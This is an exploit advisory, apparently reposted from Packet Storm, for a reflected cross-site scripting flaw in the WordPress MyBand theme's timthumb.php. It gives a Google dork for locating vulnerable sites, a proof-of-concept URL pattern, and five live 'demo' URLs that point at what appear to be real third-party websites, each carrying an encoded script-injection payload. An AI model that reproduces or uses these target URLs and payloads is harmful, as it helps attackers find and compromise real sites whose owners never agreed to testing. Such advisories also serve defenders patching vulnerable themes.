WordPress MyBand theme suffers from a cross site scripting vulnerability. This finding houses site-specific data.
117ffb3b858d7a1be734b0e661c3e5e48ee0e3e8cc8f5900ff0a5f087910767a|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [*] Exploit Title: Wordpress MyBand Theme Cross site scripting
|
| [*] Exploit Author: Ashiyane Digital Security Team
|
| [*] Date : Date: 2014-08-03
|
| [*] Vendor Homepage : http://www.mybandtheme.com
|
| [*] Google Dork: inurl:wp-content/themes/myband
|
| [*] Tested on: Windows , Mozila Firefox
|-------------------------------------------------------------------------|
| [*] Kind: XSS Reflected
|
| [*] PoC :
|
| [*] [Localhost]/wordpress/wp-content/themes/myband/timthumb.php?src=[XSS]
|-------------------------------------------------------------------------|
| [*] Demo:
|
| [*]
http://www.appoloss.fr/site/wp-content/themes/myband/timthumb.php?src=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
| [*]
http://www.sirusofficial.com/wp-content/themes/myband/timthumb.php?src=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
| [*]
http://theargues.ca/wp-V2/wp-content/themes/myband/timthumb.php?src=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
| [*]
http://www.acyl.fr/wp-content/themes/myband/timthumb.php?src=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
| [*]
http://t-rox.ca/wp-content/themes/myband/timthumb.php?src=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
|-------------------------------------------------------------------------|
| [*]Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed